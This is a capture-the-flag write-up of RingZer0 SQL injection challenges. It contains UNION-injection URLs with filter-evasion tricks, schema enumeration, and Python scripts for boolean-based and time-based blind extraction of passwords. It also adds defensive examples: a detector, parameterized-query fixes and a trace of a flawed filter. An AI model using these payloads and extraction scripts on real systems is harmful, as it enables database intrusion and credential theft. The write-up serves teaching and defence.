- SQL injection:
Quote of the day -- the query result is echoed back, so try a UNION injection. Spaces are filtered; replace them with /**/ or %0a.
https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,database()
Result: the current database is sqli_quote.
https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=0x73716c695f71756f7465)
Output, listing the tables: Quote of the day: alkdjf4iu,quotes
https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x616c6b646a66346975)
Output, listing the columns: Quote of the day: id,flag
https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/flag/**/from/**/alkdjf4iu/**/limit/**/0,1)
Output, the flag: Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J
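An added example, not part of the original notes and not the challenge's code: a small detector that undoes the tricks used above (/**/ comments and %0a in place of spaces) before matching for UNION ... SELECT, run over constructed request lines modelled on the URLs in this section. The sample lines and the function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (query strings mirror the ones in the
# notes above); these are not real server logs.
SAMPLE_REQUESTS = [
    "/challenges/37?q=8",
    "/challenges/37?q=8/**/union/**/select/**/1,database()",
    "/challenges/37?q=8%0aunion%0aselect%0a1,2",
    "/challenges/39/?id=3%20union%20select%201,sqlite_version()",
    "/challenges/37?q=hello%20world",
]

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT_RE = re.compile(r"\bunion\b(\s+all)?\s+\bselect\b", re.I)


def normalize(query: str) -> str:
    """Undo the tricks that hide whitespace from a naive space filter:
    percent-decode (twice, for double-encoded input), replace inline
    comments with a space, collapse all whitespace including newlines."""
    s = unquote_plus(query)
    s = unquote_plus(s)
    s = COMMENT_RE.sub(" ", s)
    s = re.sub(r"\s+", " ", s)
    return s


def is_union_injection(request_line: str) -> bool:
    """True if the normalized request contains a UNION [ALL] SELECT."""
    return UNION_SELECT_RE.search(normalize(request_line)) is not None


def flag_requests(lines):
    """Return only the request lines that look like UNION injection."""
    return [line for line in lines if is_union_injection(line)]


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print("suspicious:", hit, "->", normalize(hit))
```

A filter that only strips spaces is defeated by /**/ or %0a, as the notes show; normalising comments and encoded whitespace makes the pattern visible again, but pattern matching of this kind is only a detection aid. The fix on the application side is to bind q as a query parameter instead of splicing it into the SQL text.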
=====
Thinking outside the box is the key -- this is a UNION injection against SQLite. The following statement displays the SQLite version.
https://ringzer0team.com/challenges/39/?id=3 union select 1,sqlite_version() #
https://ringzer0team.com/challenges/39/?id=3%20union%20select%201,(select%20name%20from%20sqlite_master%20limit%200,1)%20#
https://ringzer0team.com/challenges/39/?id=3 union select 1,(select group_concat(tbl_name) from sqlite_master where type='table')
Table names, from which to guess the right one: random_stuff,ajklshfajks,troll,aatroll
https://ringzer0team.com/challenges/39/?id=3 union select 1,(select group_concat(sql) from sqlite_master where name='ajklshfajks')
CREATE TABLE ajklshfajks (flag varchar(40))
https://ringzer0team.com/challenges/39/?id=3 union select 1,(select flag from ajklshfajks limit 0,1 )
FLAG-13lIBUTHNFLEprz2KKMx6yqV
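An added example, not the challenge's code: a SQLite lookup built by string formatting, which the union select ... from sqlite_master payload above turns into a schema dump, next to the same lookup with a bound parameter, where the payload is just a value that matches no id. The in-memory schema reuses the table names above with a placeholder flag; function names are my own.

```python
import sqlite3

PAYLOAD = ("3 union select 1,(select group_concat(tbl_name) "
           "from sqlite_master where type='table')")


def build_db() -> sqlite3.Connection:
    # Constructed schema that mirrors the table names in the notes;
    # the flag value is a placeholder, not the challenge's real flag.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE random_stuff (id int, message varchar(50));
        CREATE TABLE ajklshfajks (flag varchar(40));
        INSERT INTO random_stuff VALUES (1, 'one'), (2, 'two'), (3, 'three');
        INSERT INTO ajklshfajks VALUES ('FLAG-placeholder');
    """)
    return conn


def lookup_vulnerable(conn, user_id: str):
    # Vulnerable: the untrusted id is spliced into the SQL text, so a
    # trailing "union select ..." becomes part of the statement and the
    # second column of the result carries whatever the attacker selected.
    sql = "SELECT id, message FROM random_stuff WHERE id=%s" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id: str):
    # Hardened: the id is bound as a parameter. SQLite treats the whole
    # string as a value, never as SQL; non-numeric input matches nothing.
    sql = "SELECT id, message FROM random_stuff WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


def leaked_values(conn, user_id: str):
    """Second-column values the vulnerable lookup returns for user_id."""
    return {str(row[1]) for row in lookup_vulnerable(conn, user_id)}


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))
    print("safe:      ", lookup_safe(db, PAYLOAD))
```

With the bound parameter the same payload is compared against the id column as text, and the query returns nothing; only a plain number such as "3" still finds its row.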
=============
When it's lite it's not necessarily easy
Entering admin / 1 gives "Invalid username / password."
Entering 1 / 1 gives "No user found."
Presumably the username is checked first, and the password is compared only if a row is found for that username.
So this is the common boolean-based blind injection.
payload :
password=1&username=1' or ('4'='5') and 'a'='a , response: No user found
password=1&username=1' or ('4'='4') and 'a'='a , response: Invalid username / password
In other words, whenever the injected condition ('4'='4' here) is true, the response is Invalid username / password.
Python script:
import requests
import string

# Python 3 version of the script (the original was written for Python 2).
url = "https://ringzer0team.com/challenges/19"
cookie = {
    "PHPSESSID": "q9k4np79r1uf4fuss3lt0lreh1",
    "_ga": "GA1.2.884720986.1529671391",
    "_gid": "GA1.2.884720986.1529671391"
}
flag = ""
for i in range(1, 10):
    print("i:", i)
    for j in "0123456789" + string.ascii_letters + "-_!@#$^&*()={}":
        data = {
            # true condition -> "Invalid username / password", false -> "No user found"
            "username": "1' or (substr((select password from users where username='admin'),%s,1)='%s') and 'a'='a" % (i, j),
            # "username": "1' or (substr((select password from users where username ='admin' limit 0,1),1,1)='4') and 'a'='a",
            "password": "1"  # 4dm1nzP455
        }
        r = requests.post(url=url, data=data, cookies=cookie)
        if "Invalid username / password" in r.text:
            flag += j
            print(flag)
            break
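An added example, not the challenge's code: a login handler that reproduces the two messages described above, so the two payloads from this section return No user found and Invalid username / password exactly as in the notes, next to a hardened version with a bound parameter, a single failure message and a constant-time comparison. The users table and password are constructed placeholders, and the function names are my own. The same fix also removes the time-based variant used in the Login portal 4 section below, since the injected if(...,sleep(3),1) never reaches the SQL parser.

```python
import hmac
import sqlite3

NO_USER = "No user found."
BAD_LOGIN = "Invalid username / password."


def build_db() -> sqlite3.Connection:
    # Constructed users table; the password is a placeholder, not the challenge's.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'placeholder-pass')")
    return conn


def login_vulnerable(conn, username: str, password: str) -> str:
    # Vulnerable: string-built query plus two different error messages.
    # The row lookup succeeds whenever the injected condition is true, so
    # the message itself becomes a one-bit oracle on any SQL expression.
    sql = "SELECT password FROM users WHERE username='%s'" % username
    row = conn.execute(sql).fetchone()
    if row is None:
        return NO_USER
    if row[0] != password:
        return BAD_LOGIN
    return "Welcome"


def login_safe(conn, username: str, password: str) -> str:
    # Hardened: bound parameter, one failure message for both cases, and a
    # constant-time comparison so the response reveals neither which step
    # failed nor how much of the secret matched. (Real code would compare a
    # password hash, not the stored password itself.)
    row = conn.execute("SELECT password FROM users WHERE username=?",
                       (username,)).fetchone()
    stored = row[0] if row else ""
    ok = row is not None and hmac.compare_digest(stored.encode(), password.encode())
    return "Welcome" if ok else BAD_LOGIN


if __name__ == "__main__":
    db = build_db()
    for payload in ("1' or ('4'='5') and 'a'='a", "1' or ('4'='4') and 'a'='a"):
        print(repr(payload))
        print("  vulnerable:", login_vulnerable(db, payload, "1"))
        print("  safe:      ", login_safe(db, payload, "1"))
```

On the hardened handler both payloads are just usernames that do not exist, and an attacker can no longer tell a false condition from a true one, or a missing user from a wrong password.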
=============
No more hacking for me!
From the page source:
<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->
So the single quote ' is filtered.
Add the URL decode the request itself undergoes, and the value is decoded three times in total.
Triple URL-encode the single quote: %252527.
Try a UNION injection; there are three columns.
https://ringzer0team.com/challenges/74/?id=1 %252527 union select 1,2,3--
Column 2 is echoed.
So enumerate through column 2:
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527 limit 0,1 --
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527 and tbl_name=%252527random_data%252527 limit 0,1 --
random_data CREATE TABLE random_data (id int, message varchar(50), display int)
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --
Note: why SQLite enumeration is written this way still needs further study.
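An added example, not the challenge's code: the filter chain from the HTML comment above re-implemented in Python and traced step by step, to show why %252527 ends up as a bare single quote while ' and %2527 do not. html.escape stands in for htmlspecialchars(ENT_QUOTES) and a hand-written addslashes for PHP's; the function names are my own.

```python
import html
from urllib.parse import unquote


def htmlspecialchars_ent_quotes(s: str) -> str:
    # Approximates PHP htmlspecialchars($s, ENT_QUOTES): & < > " ' become
    # entities. PHP emits &#039; for the single quote, Python emits &#x27;;
    # the difference does not matter for the argument below.
    return html.escape(s, quote=True)


def addslashes(s: str) -> str:
    # PHP addslashes: backslash-escape ' " \ and NUL.
    out = []
    for ch in s:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def trace(raw_query_value: str):
    """Every stage the value passes through, starting from the raw text in
    the query string. Stage 1 is the decode PHP performs when it fills $_GET;
    the rest is the filter from the comment, innermost call first."""
    steps = [("raw query string", raw_query_value)]
    s = unquote(raw_query_value); steps.append(("$_GET (decode #1)", s))
    s = htmlspecialchars_ent_quotes(s); steps.append(("htmlspecialchars", s))
    s = unquote(s); steps.append(("urldecode (decode #2)", s))
    s = s.replace("'", ""); steps.append(("str_replace", s))
    s = addslashes(s); steps.append(("addslashes", s))
    s = unquote(s); steps.append(("urldecode (decode #3)", s))
    return steps


def filter_from_raw_url(raw_query_value: str) -> str:
    """What the SQL statement finally receives for a given raw id value."""
    return trace(raw_query_value)[-1][1]


if __name__ == "__main__":
    for raw in ("1'", "1%27", "1%2527", "1%252527"):
        print(raw)
        for name, value in trace(raw):
            print("  %-22s %s" % (name, value))
```

The defect is ordering: the last urldecode runs after str_replace and addslashes have already done their work, so any quote that is still percent-encoded at that point is restored untouched. Decoding should happen once, before validation, and the value should then be bound as a parameter rather than filtered.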
=============
Login portal 4
Time-based blind injection:
import requests

# Python 3 version of the script (the original was written for Python 2).
url = "https://ringzer0team.com/challenges/6"
cookie = {
    "PHPSESSID": "vtqgjp8amva1fsr6eolee70af4",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081",
    "_gat": "1"
}
flag = ""
for i in range(1, 1000):
    found = False
    for j in range(33, 127):
        print("i:", i, "j:", j)
        data = {
            # a correct guess makes the server sleep(3), which trips the 2.5 s timeout
            "username": "1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '" % (i, j),
            "password": "1"
        }
        try:
            r = requests.post(url=url, data=data, cookies=cookie, timeout=2.5)
        except requests.exceptions.Timeout:
            flag += chr(j)
            print(flag)
            found = True
            break
    if not found:  # no character matched at this position: end of the string
        break
A few notes on the code:
1. ASCII values are compared rather than strings directly, because MySQL string comparison is case-insensitive by default.
2. || is used instead of or; from testing, the back end apparently blocks or.